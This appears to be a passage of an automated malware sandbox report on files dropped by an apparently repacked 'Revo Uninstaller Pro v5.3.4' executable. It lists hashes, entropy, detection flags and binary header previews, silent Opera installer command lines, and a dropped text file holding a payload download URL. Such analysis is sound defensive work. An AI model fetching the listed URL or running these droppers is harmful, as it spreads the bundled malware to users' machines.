                                                                                                                                                                          SSDEEP:49152:GEKRfz9PgHG9uUkqS/cmsLPGkLgHfC8wlPWz88RlfpwrjsWWv89uwbSzAMZo6h8e:GRfB2upPBxAUg/Jb9R
                                                                                                                                                                          MD5:E821132DBECE4D288D3B1B3B68373B3A
                                                                                                                                                                          SHA1:DAC86F72E5C2AAEB5EFDFEA06BF9C5DEF980C74E
                                                                                                                                                                          SHA-256:E786FA86DB21A4FFE8F78EBF032715390C05D1EDBDB6C90FEF75E0ED3D946CD3
                                                                                                                                                                          SHA-512:4701788F4A91F76F3A63843935DF5A8F80535D85FF0F760AF86C21601D73B40F8C4D00A883DC64E50482C201BB7D4F3867A038223593227AC79AA14520F2068E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:SQLite format 3......@ ......KX..:P......._.....................................................-.(.................R.......................................!........tableILogsILogs..CREATE TABLE [ILogs] ([Number] INTEGER PRIMARY KEY NOT NULL UNIQUE, [Name] TEXT NOT NULL, [Publisher] TEXT, [Version] TEXT NOT NULL, [GUID] TEXT NOT NULL UNIQUE, [WVer] TEXT NOT NULL, [WVer64Bits] INTEGER NOT NULL, [RKey] TEXT, [RDN] TEXT, [RUS] TEXT, [RPVer] TEXT)*...=...indexsqlite_autoindex_ILogs_2ILogs..*...=...indexsqlite_autoindex_ILogs_1ILogs.......Q.5G!..indexsqlite_autoindex_ILogs_bak0_2ILogs_bak0....UG!..indexsqlite_autoindex_ILogs_bak0_1ILogs_bak0.... .!!...tableILogs_bak0ILogs_bak0.CREATE TABLE "ILogs_bak0" ([Number] INTEGER PRIMARY KEY NOT NULL UNIQUE, [Name] TEXT NOT NULL, [Version] TEXT NOT NULL, [GUID] TEXT NOT NULL UNIQUE, [WVer] TEXT NOT NUL...T))._tablecreation_tablecreation_tableC.CREATE TABLE creation_table (tmp INTEGER)X........tableInfoInfo.CREATE TABLE Info (NProgs TEXT, Ver TEXT, D
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):10103264
                                                                                                                                                                          Entropy (8bit):6.199563892292486
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:196608:TqWbk1lXrMI8h9rGe2DvwfaycAE9kspvCJ6UkXzp91IIH91IL91I0:Tq2OiI8h8rBx91IW91IL91I0
                                                                                                                                                                          MD5:216B49B7EB7BE44D7ED7367F3725285F
                                                                                                                                                                          SHA1:CF0776ECBC163C738FD43767BEDCC2A67ACEF423
                                                                                                                                                                          SHA-256:C6D97857B3B9F26C8E93D7B6E6481F93A16DB75CBF9D1756CB29FBA0FD9E240E
                                                                                                                                                                          SHA-512:060FB76D91BEE1B421F133CAE17726A68ADC97DDCE76A67196D10E735E216D032BEE939C905B847C50F29E859DCA43CDF1B19E4AE349E00EFE88147224D665CB
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....?Y..................^..L;.......^.......^...@.......................... ..................@...................@i.b.....h..k...0q...1..............5...pi..............................`i.......................h......0i......................text....n^......p^................. ..`.itext..x2....^..4...t^............. ..`.data....-....^.......^.............@....bss.........._..........................idata...k....h..l...._.............@....didata......0i......B`.............@....edata..b....@i......N`.............@..@.tls.........Pi..........................rdata.......`i......P`.............@..@.reloc.......pi......R`.............@..B.rsrc.....1..0q...1...h.............@..@............. ......................@..@................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65794
                                                                                                                                                                          Entropy (8bit):7.997450817749907
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:1536:wg8dvQaFp4zqjLCzkCYlnXMEbnxbiHgsWtXTiKE6AXutI0b:6dvPFHLCzYlnXBUg3TibT+5
                                                                                                                                                                          MD5:8462A9B69C76A9603A4143D51FBC201E
                                                                                                                                                                          SHA1:4473590F93F94F22C340A354516191C3C0BA6532
                                                                                                                                                                          SHA-256:FE4BCB4251F77375119A936C80FB36221AF0C5105E840E2E115D47F96CB437C8
                                                                                                                                                                          SHA-512:2F02ECDB06760A093F4D8E6F04C97138695B064DB8CB2DCC4AF9B47C829852F38B77BE9425EB2F3E3E36F85DA181C116C829921FA35AE68AFC57C728D5393570
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: ...h..$...n.y].o~....(...G..\.....%..c..<..`......*..../p...N.?H.K....*...c.1~.K...No.yF...$..u..1z..-....>..1.jT=.....t....m.45`D.).w..d]m..F....s3=..6.#.....F...*j.Z..^...:\).......?..f39.$E.F.&....L)..*$dQ.F..T..j.p..h@..b..Qd..H.gO.q..>.....WA...[...P...Jf....".....KV.,.,D_I.b,._..r..g....B.I.....F..Dh3...4..Bg..........P.,y....9B.\..).7...v..d:.b...L........ ?._. .>o..@q......K.........\...jv;.......{}....UH..J/.|..1.g"N.#PRB.c...D..=d.g.........9.....h.%i...-Q55....W...1g.[.=]..<$.4..]7K.Y.T.....q....1...s....N. EC.E.Ov.S..G.YE....g.......U..]...c..<...........2W.'..2.!....AE$@..H........8A.\.H.f.x\.|o.z.u%9.X...u>7....\'.VX.5=HR.."D~Y...9...r3.u.3...........jL...m`...d..vA...Q.l^.....8=.F.0.l..eg;b.....H.CwjbV3.... N............@.o.m.R..|n.e.\.......6..._.p.....r..U..Ha......r...)..%.qeg..(o..;...H....L*6.-...I.Q..V....b>Z.z.n.0!...O&..#.`..8.......y:..M..S........v..a;E\d.].!.7.....2M.$,...&..lu...)...U..i...P4..8.*1..6..k.
                                                                                                                                                                          Process:C:\Windows\System32\runonce.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):24576
                                                                                                                                                                          Entropy (8bit):2.0805221367031055
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:AT2ALc5HmO8BW8QUV9iSdvoxnpfcHv9qoCSDxAKKwsrDlwp/lHuA85qcLpl9dvmX:ur
                                                                                                                                                                          MD5:6E91F61773A9AC46E649BD5994A87984
                                                                                                                                                                          SHA1:7E01D8F46AA036F290C082AAAD6EDF0BB1D59F56
                                                                                                                                                                          SHA-256:F129573669E3AB37DF43C29F01CACBDEE81AB585C1E48963469D32E67B5E659D
                                                                                                                                                                          SHA-512:953D0AA6D884B37F82CEE91C9455330EC241D02C44FF385A9BBB13488FF3CBEA93B5C613D61579782DB78D13881AF255AD21EDD1C170A017E8F5D56791357222
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:. ..............................................................................l...h...]c.@............. ......eJ......F|..ZJ..Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................R.............".g.ZJ..........E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.E.x.p.l.o.r.e.r.\.E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...e.t.l...........P.P.l...h......@............................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):52557824
                                                                                                                                                                          Entropy (8bit):7.999863400173674
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:1572864:n7yZY5/4lwimbCtaWcBsUjcNVvA1okyDlnCHqn:W0glpmOIOocHvrkyZJ
                                                                                                                                                                          MD5:75272ABD800147A68B0CC4D682B82DA3
                                                                                                                                                                          SHA1:8E8257578EC420F8C5E5302E30A1EDDB2501BFD7
                                                                                                                                                                          SHA-256:892192155025DFA8BF058D04BC1430AD073F29FD1F00EE3C05F41598D8536109
                                                                                                                                                                          SHA-512:1468568A34C4DA057B8D6E0618748B50EAC25BD534BE7C303FB299344E40891FD6EF662791D1E542C858AE91414524845AFAE02D628C9BBEBD75B6BBA5F80CA9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(2S&lS=ulS=ulS=u'+>t`S=u'+8t.S=u..8tAS=u..9t.S=u..>tyS=u'+9tyS=u'+<teS=ulS<u.S=u..5t:S=u...umS=ulS.umS=u..?tmS=uRichlS=u........PE..L...4.if...............'..........................@................................./.&...@..................................R..d....................y&..).......&......................................@............................................text............................... ..`.rdata..............................@..@.data....A...`.......J..............@....rsrc................`..............@..@.reloc...&.......(...j..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                          Entropy (8bit):4.036006945330954
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:N8MfXFLVt:2ghVt
                                                                                                                                                                          MD5:9D1787D69C72AE1531A6EFE6C058EBFA
                                                                                                                                                                          SHA1:847875E77AF8048EDF1A8A6D732D48F2A9B5CC96
                                                                                                                                                                          SHA-256:8C041E42595D9BF69B3293050B297A4BE644F57162DD362CA9C0E2EC15CE538D
                                                                                                                                                                          SHA-512:9A8CA8DFDEF274561C467B50C837C4BCA2A632995CEF8EDB565FA2872D4BD952EFD2EA0BDF32DA252CA0F949704245B8D335F1737B35F4D71ED35ADEFEE8F7C8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:https://mail.repack.me/tsjtmfdm.pkg
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2227280
                                                                                                                                                                          Entropy (8bit):7.916292558024388
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:mVAbw0dQH5x+E1Q9AA06OT9S7+rICzXNagRt532Z8JtS:iAJdi3+ZN06+Nzdn5w8i
                                                                                                                                                                          MD5:5A1105F1C25A60B128D45EC03041BF48
                                                                                                                                                                          SHA1:DCCC4587FB20170B8014DEB61A7C371FAC15ED01
                                                                                                                                                                          SHA-256:C2A58EFE4CDD4CD48A9C2F77CBA4BC0898F0A5953F6065C2D270A8A1DC7A8FCD
                                                                                                                                                                          SHA-512:9058164DCD3B802268DC8D5EC916A53976CF17CF6A4D4F5BE9626B91DDAED7AE159E009E90E0FBF0D1E16CD4C00C4D9268FF67D2F5D43037002D91E4C4017D48
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N....m...m...m..A....m..A....m...._m.....m.....m..A....m..A....m...m...m....\m....X..m...m0..m.....m..Rich.m..........PE..L.....if...............'..........................@..................................5"...@.................................H...d.......p.............!..+.......1...C...............................C..@...............0............................text............................... ..`.rdata..z...........................@..@.data....K..........................@....rsrc...p...........................@..@.reloc...1.......2..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1768
                                                                                                                                                                          Entropy (8bit):4.387798711970492
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:YqRyRrRs2RDtRCRa7jRzRMR9R89R/R5DR3RoRXsRWEIiRTR4RbR8xRSRGjRIjRK1:FCFVDjS49QzqZ5NhMXwWELdc18XiWMK1
                                                                                                                                                                          MD5:9F974F37C6D2E65618B43735A39A3222
                                                                                                                                                                          SHA1:29664AB40F388E00AFE959EBF9D840BEA0DD59DD
                                                                                                                                                                          SHA-256:18894BB2111DCEF31F92F19A3244457C58A14BFC5C04688F3DB803492DA9F706
                                                                                                                                                                          SHA-512:D829E225B290ECE8BFA583558D4AD68A7BD0825F78EA5CE8A3FC01F12BC0FCF16F6371082050085461583DF978251422F6556BED78830EFF20C83BC7B9FDE8F9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:{"features":{"01979299c8cd":{"state":"enabled"},"03b8357e5a08":{"state":"enabled"},"06fbbd0b7bf7":{"state":"enabled"},"0f9cf8758bcc":{"state":"disabled"},"1c4dddb65bac":{"state":"enabled"},"1d24dceb937a":{"state":"enabled"},"2114dc8bd72a":{"state":"enabled"},"26f7e2d59ecf":{"state":"enabled"},"278deecb29a1":{"state":"enabled"},"3389f6c15eb9":{"state":"enabled"},"3993848b2bd9":{"state":"enabled"},"3fc0872a857b":{"state":"enabled"},"40db6e644d2c":{"state":"disabled"},"50796754ffc7":{"state":"enabled"},"5448a57d6689":{"state":"disabled"},"54a846ecd4f2":{"state":"enabled"},"56d717ae3ad6":{"state":"enabled"},"5a28d66c82cd":{"state":"enabled"},"5ee708e89d7b":{"state":"disabled"},"603cade21cf7":{"state":"enabled"},"654296fe9d6c":{"state":"enabled"},"6713f3df0bed":{"state":"enabled"},"804beb213cf7":{"state":"enabled"},"818c3ef12d0b":{"state":"enabled","dna_filter":{"required_dna":["64336fb81a04836eb8108d24fbca3aa3682db0a5"],"forbidden_dna":["5b3eb4a6c335a0659d16d1a189ca155e4441ea14"]}},"8be49a
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):419886
                                                                                                                                                                          Entropy (8bit):7.320460842483817
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:q/iQb+ckQsH8TDRGKJkSvGUlYG2EY8NqK9XXHJoPNKAZzOndNyLMfjRxXdS:5Qnk3GDYKGcblBY8Y23mZ0dYmV0
                                                                                                                                                                          MD5:A868E9C0A97C2EF80602C0F6634913F8
                                                                                                                                                                          SHA1:9E3F70A600DDC17D018612B08854F702E24AE5D3
                                                                                                                                                                          SHA-256:691DF930404FB3CB974F183C849C4B1EDDC63EC3BCA579EEE24F8A59E702FE11
                                                                                                                                                                          SHA-512:611D06A34D007CB4D321400A318BA727B07971916F7207EF7D0D45383B7DC38361EA296904646F9079D9C42D87BD375F500D969BF9AA9C6906472655D84E6EF1
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....}|^..................................... ....@..................................D....@.........................@...4...t...<.... ..''...................P...!.....T............................B..@............ ..`...... ....................text............................... ..`.rdata..2.... ......................@..@.data....8..........................@....gfids..............................@..@.rsrc...''... ...(..................@..@.reloc...!...P..."..................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2228
                                                                                                                                                                          Entropy (8bit):5.333176307128504
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:FWSU4Yymp+gs4RIoU99tK8NPZHYsu1iMugeVV/gXnPUyuq1xf:FLHYvvsIfA2KRHKugWqp
                                                                                                                                                                          MD5:A3CB5CD774669961BE0AB119D9C772CB
                                                                                                                                                                          SHA1:74B0632A2D273BC4D9F4D85C0DDA2029127231D1
                                                                                                                                                                          SHA-256:9635016EAA9B3A19CAA23A41D896771EE25704E5C59B998572AE219A8CB2F3D8
                                                                                                                                                                          SHA-512:802FDB022D4FAF3EB9CD4F7D61D30BE0AC182EA36A7666A3EE30E12FFA9F5232C3B35BA8F67586261FCAF23039148B15216D69F646F7D0593F5C79B5E2F5CAEC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:@...e.......................T.S.S.......*.......................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):52557824
                                                                                                                                                                          Entropy (8bit):7.999863400173674
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:1572864:n7yZY5/4lwimbCtaWcBsUjcNVvA1okyDlnCHqn:W0glpmOIOocHvrkyZJ
                                                                                                                                                                          MD5:75272ABD800147A68B0CC4D682B82DA3
                                                                                                                                                                          SHA1:8E8257578EC420F8C5E5302E30A1EDDB2501BFD7
                                                                                                                                                                          SHA-256:892192155025DFA8BF058D04BC1430AD073F29FD1F00EE3C05F41598D8536109
                                                                                                                                                                          SHA-512:1468568A34C4DA057B8D6E0618748B50EAC25BD534BE7C303FB299344E40891FD6EF662791D1E542C858AE91414524845AFAE02D628C9BBEBD75B6BBA5F80CA9
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(2S&lS=ulS=ulS=u'+>t`S=u'+8t.S=u..8tAS=u..9t.S=u..>tyS=u'+9tyS=u'+<teS=ulS<u.S=u..5t:S=u...umS=ulS.umS=u..?tmS=uRichlS=u........PE..L...4.if...............'..........................@................................./.&...@..................................R..d....................y&..).......&......................................@............................................text............................... ..`.rdata..............................@..@.data....A...`.......J..............@....rsrc................`..............@..@.reloc...&.......(...j..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5740952
                                                                                                                                                                          Entropy (8bit):6.869655224466312
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:Y5hxwD6666666666666666666666666666666x666666666666666fwwwwwwwwwt:H3gRKPR+UIYbL8v515oa7IC
                                                                                                                                                                          MD5:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                                                          SHA1:ACD4E95365DBD1256B8DDAA747C82AD8EF3D85CD
                                                                                                                                                                          SHA-256:2A4E429693A6DA362CD89967271831B99C88F0C6F696946E66852969D883233B
                                                                                                                                                                          SHA-512:76BBBD271182109E501482A23D136DA0C8A4669664A9B284C7C8249870D1CE47191BEFA69D668719B63225211A4F9DB8B63E3BAB41D5F35C33455B4D18832513
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."......d....S...................@...........................W.....t.X...@.................................8%..P.........Q..........pW..)....W..6...".......................!.......................'...............................text...;b.......d.................. ..`.rdata...............h..............@..@.data...$5...P.......8..............@....tls.................V..............@....rsrc.....Q.......Q..X..............@..@.reloc...6....W..8...8W.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (1613)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5580
                                                                                                                                                                          Entropy (8bit):5.740851370470795
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:PX5h//Lht1FAU68jVM8KSTc//ME4ClN10XCN+:vL/ZF88pM8KSg/2ClNIC8
                                                                                                                                                                          MD5:ADE9CE7ABFE878A4BC129731634767F0
                                                                                                                                                                          SHA1:129A542CC83983CA6C3A93E01C891BB267E7FD3F
                                                                                                                                                                          SHA-256:14AF71CA3B2AF49738D9DA4CAE60FE63EF208CE496812F5A0F41A6B22911D175
                                                                                                                                                                          SHA-512:2AA0E171CA6B0F570E96AFC18A8BE5C393D4D537893E8BB7F60385800D83848F30EC7C57031FF35A86FD2567A75202594985CEC97F259A7397044F004817DEF5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:[1209/115408.145:INFO:installer_main.cc(475)] Opera installer starting - version 115.0.5322.77 Stable.[1209/115408.145:INFO:installer_main.cc(478)] Command line: "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --silent --allusers=0 --server-tracking-blob=NjAxODRkYTk2NmVjNjFhZDRjZmFkOGU5NDAyOGEwYWNlYzViZGE5ZjVkYTg0YmUwMzJiZDRjZWFjZGQ4ODM0Njp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwidGltZXN0YW1wIjoiMTczMzc2MzI0Mi4yNjIyIiwidXNlcmFnZW50IjoiTlNJU19JbmV0YyAoTW96aWxsYSkiLCJ1dG0iOnsiY2FtcGFpZ24iOiJyMTAiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJEV05MU1QifSwidXVpZCI6ImNkOWY4MWM2LTcyOWEtNGQ5NS1hYzcxLTFlYmJhNzViZmM3YiJ9.[1209/115408.145:INFO:installer_main.cc(500)] Uninstall:0.[1209/115408.145:INFO:installer_main.cc(501)] Silent:1.[1209/115408.145:INFO:installer_main.cc(502)] Run Immediately0.[1209/115408.145:INFO:installer_main.cc(504)]
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2997
                                                                                                                                                                          Entropy (8bit):5.6895746648906025
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:Gbb4hXTbpxX6QMdLOvadLndYwcVBJTleVnZ/Q5VEb6zClt3WbLf9JbAbOSbNbBb3:fXhM8KSTc//ME4hr6UnoP
                                                                                                                                                                          MD5:AEBE96FF2FFA5659A6A20B536895A9A9
                                                                                                                                                                          SHA1:3F491204A62A61C38305452F7713D9A7C3880EBC
                                                                                                                                                                          SHA-256:BF0A2EA802D96FABA07124F88634095D93E0D222F00DF5217E7E15AF33023A90
                                                                                                                                                                          SHA-512:F030425CCC20AB2EFE82991496A0D431C9F1B465CD8CA7A57A3E69BF7C987332B60AB441D2C9E8490447BEB7C71C1E14DBF206A1477745D30140C1A58F615486
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:[1209/115410.771:INFO:installer_main.cc(475)] Opera installer starting - version 115.0.5322.77 Stable.[1209/115410.771:INFO:installer_main.cc(478)] Command line: "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob=ZTEzMzE3M2U4ODhkN2Y3YmE0ODQ3NmYwNmNlNmJmMDE4NmY4MzAzYmNmNWRmMWYyY
                                                                                                                                                                          Process:C:\Users\user\Downloads\OperaSetup.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5740952
                                                                                                                                                                          Entropy (8bit):6.869655224466312
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:Y5hxwD6666666666666666666666666666666x666666666666666fwwwwwwwwwt:H3gRKPR+UIYbL8v515oa7IC
                                                                                                                                                                          MD5:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                                                          SHA1:ACD4E95365DBD1256B8DDAA747C82AD8EF3D85CD
                                                                                                                                                                          SHA-256:2A4E429693A6DA362CD89967271831B99C88F0C6F696946E66852969D883233B
                                                                                                                                                                          SHA-512:76BBBD271182109E501482A23D136DA0C8A4669664A9B284C7C8249870D1CE47191BEFA69D668719B63225211A4F9DB8B63E3BAB41D5F35C33455B4D18832513
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."......d....S...................@...........................W.....t.X...@.................................8%..P.........Q..........pW..)....W..6...".......................!.......................'...............................text...;b.......d.................. ..`.rdata...............h..............@..@.data...$5...P.......8..............@....tls.................V..............@....rsrc.....Q.......Q..X..............@..@.reloc...6....W..8...8W.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5189528
                                                                                                                                                                          Entropy (8bit):6.8622234075396875
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                                                          MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                                                          SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                                                          SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                                                          SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5189528
                                                                                                                                                                          Entropy (8bit):6.8622234075396875
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                                                          MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                                                          SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                                                          SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                                                          SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
